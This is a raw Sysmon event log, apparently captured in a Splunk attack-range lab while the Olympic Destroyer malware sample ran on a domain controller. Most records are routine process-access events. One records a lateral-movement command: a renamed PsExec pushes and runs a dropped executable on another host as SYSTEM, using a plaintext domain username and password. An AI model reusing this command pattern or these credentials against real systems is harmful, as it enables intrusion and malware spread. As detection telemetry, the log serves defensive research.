11:04:49.643{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.643{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.643{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.643{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.639{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-14D1-6216-AC06-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000294998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.636{C8EA50B7-14D1-6216-AC06-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-15.eu-central-1.compute.internal -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000294997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.636{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-14D1-6216-AC06-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000294996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:47.721{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49195-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.462{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B8F5B04FE25DBE5C3A9661544153D3A,SHA256=4DE9079D9D2917EA0E8D5ED4351F6C32C059CFE9B3F137E41EA49B39BE932467,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219232Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.863{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-14D1-6216-C004-000000003902}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219231Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219230Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219229Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219228Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219227Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219226Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219225Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219224Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219223Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219222Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.863{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-14D1-6216-C004-000000003902}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219221Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.863{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-14D1-6216-C004-000000003902}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219220Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.864{4F8D34B0-14D1-6216-C004-000000003902}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000219219Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.613{4F8D34B0-14D1-6216-BF04-000000003902}11722892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219218Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219217Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219216Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219215Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219214Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:49.363{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-14D1-6216-BF04-000000003902}1172C:\Program 